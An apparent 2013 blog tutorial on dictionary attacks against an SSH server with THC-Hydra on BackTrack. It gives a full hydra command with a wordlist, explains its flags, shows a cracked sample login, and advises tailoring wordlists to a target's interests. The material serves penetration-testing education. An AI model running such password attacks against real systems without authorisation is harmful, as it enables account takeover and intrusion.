Friday, March 15, 2013

Attacking a server with SSH service using THC-Hydra

When we begin to learn about security, we hear that we need complex passwords to avoid being hacked; others say that the password era is over. Whatever they say, we still use passwords, and a lot of them are weak. So let's learn how a dictionary attack with Hydra works.

For this example we will use BackTrack; you can download the ISO image from here. Boot the ISO in a virtual machine, and Hydra is ready to use along with a lot of other tools. Click on the shell and type hydra.

Attacking a server with SSH service

Username: aadams
Wordlist: The one that ships with BackTrack 5 R3, located at /pentest/passwords/wordlists/darkc0de.lst

hydra -l aadams -P /pentest/passwords/wordlists/darkc0de.lst -f ssh

  • -l     login or username
  • -P    Password wordlist
  • -f     exit when a login/pass pair is found
You can see all the options by typing hydra in the shell.


[22][ssh] host:   login: aadams   password: nostradamus

Tips when you run a dictionary attack

  1. It is better to use a custom list tailored to the username we are trying, based on things like hobbies, field, industry, etc. For example, there is a high probability that somebody who likes animals a lot uses a password including animals, artists, etc.
  2. Patience: running a big list with 1 million possible passwords takes time.
  3. Try not to run an extreme attack against the service; this could crash the service, you will lose time, and the company whose security you are testing will be mad at you.
